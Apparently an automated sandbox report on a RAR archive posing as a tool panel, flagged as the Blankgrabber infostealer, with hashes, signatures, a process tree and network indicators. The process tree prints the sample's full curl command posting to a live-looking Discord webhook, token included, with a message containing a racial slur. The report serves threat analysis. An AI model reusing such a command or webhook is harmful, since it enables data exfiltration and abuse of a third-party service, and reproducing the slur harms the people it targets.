Analysis
-
max time kernel
45s -
max time network
47s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
05-11-2024 02:00
Behavioral task
behavioral1
Sample
AJ's Tool Panel V2.rar
Resource
win10ltsc2021-20241023-en
General
-
Target
AJ's Tool Panel V2.rar
-
Size
2KB
-
MD5
b72c7263ba128f6d12c3ce40812ded9c
-
SHA1
e31b07db1a3548a64b417ebe7d3295f2a8dc7608
-
SHA256
1b398f3c7c23e843b6c41e36f0274512faec6612f567202835a30e8394c6ce17
-
SHA512
e8cce4f71537ebca41db4820850db49b7519f3351b1a8bb62d8db6a2aa3840b38878229c1b7cf831ae57eb02c88cb92b973752f4742f402662901ceacbde0035
Malware Config
Signatures
-
Blankgrabber family
-
resource yara_rule behavioral1/files/0x0028000000045050-7.dat dfgdfgdfgdf -
blankgrabber
Blankgrabber is an infostealer written in Python and packaged with Pyinstaller.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 41 discord.com 42 discord.com -
Delays execution with timeout.exe 1 IoCs
pid Process 4816 timeout.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeRestorePrivilege 1020 7zFM.exe Token: 35 1020 7zFM.exe Token: SeSecurityPrivilege 1020 7zFM.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1020 7zFM.exe 1020 7zFM.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2480 wrote to memory of 936 2480 cmd.exe 94 PID 2480 wrote to memory of 936 2480 cmd.exe 94 PID 5016 wrote to memory of 4368 5016 cmd.exe 97 PID 5016 wrote to memory of 4368 5016 cmd.exe 97 PID 5016 wrote to memory of 4816 5016 cmd.exe 100 PID 5016 wrote to memory of 4816 5016 cmd.exe 100 PID 5016 wrote to memory of 3248 5016 cmd.exe 101 PID 5016 wrote to memory of 3248 5016 cmd.exe 101 PID 5016 wrote to memory of 3424 5016 cmd.exe 103 PID 5016 wrote to memory of 3424 5016 cmd.exe 103 PID 5016 wrote to memory of 1784 5016 cmd.exe 104 PID 5016 wrote to memory of 1784 5016 cmd.exe 104 -
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 42 curl/8.7.1
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\AJ's Tool Panel V2.rar"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1020
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJSLOGO.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\system32\chcp.comchcp 650012⤵PID:936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\AJ's Tool Panel V2\AJ's TooI Panel V2.bat" "1⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\chcp.comchcp 650012⤵PID:4368
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak2⤵
- Delays execution with timeout.exe
PID:4816
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:3248
-
-
C:\Windows\system32\curl.execurl -H "Content-Type: application/json" -X POST -d "{\"content\": \"**Suggestion:** 2everyone discord.gg?scamalerts niggers **Discord Username:** discord.gg?scamalerts\"}" "https://discord.com/api/webhooks/1295784698328645662/3QDP-7Fc6EO9y9tG_41a3188mlFefHaezIZHMG51_UBl61VGB0M-O_EV1aVWBM2lXTej"2⤵PID:3424
-
-
C:\Windows\system32\chcp.comchcp 650012⤵PID:1784
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD5b714f5d0c3315f80931e93370bd4146b
SHA1f1ff2d405282e323c9575d3f3d7620cb83331718
SHA256ab32009a8e419b8a70ad87862f23f10ba007d2c0e8b63c99bc13c2fd62e94d93
SHA5122801d6ea8ef8da31a3aa0ce026a3a9c4027d4710757f84d9b2886a1392072beef90713a81e72fbaf80de062d61cf43febc0561a9f24c0ac0a0f3dd407e7a1aca
-
Filesize
1KB
MD54dcceb4fddfafcbad51ada85e379551b
SHA146b881dc521a272728b10c26bddb54517ab8169c
SHA2563de4a6e8f40907ff80e51c67d7cac873c3ceab5f9f737119ca95346b8340a5cd
SHA512d3b0d1454fbfb26c9a28dd56da7ce966ff299de1d9e5a1271f32004665dbb768f18adfef1f9279f7cb438f3a323ce6b00f9ef5cd9cb8b0d80340d8a486fe43d6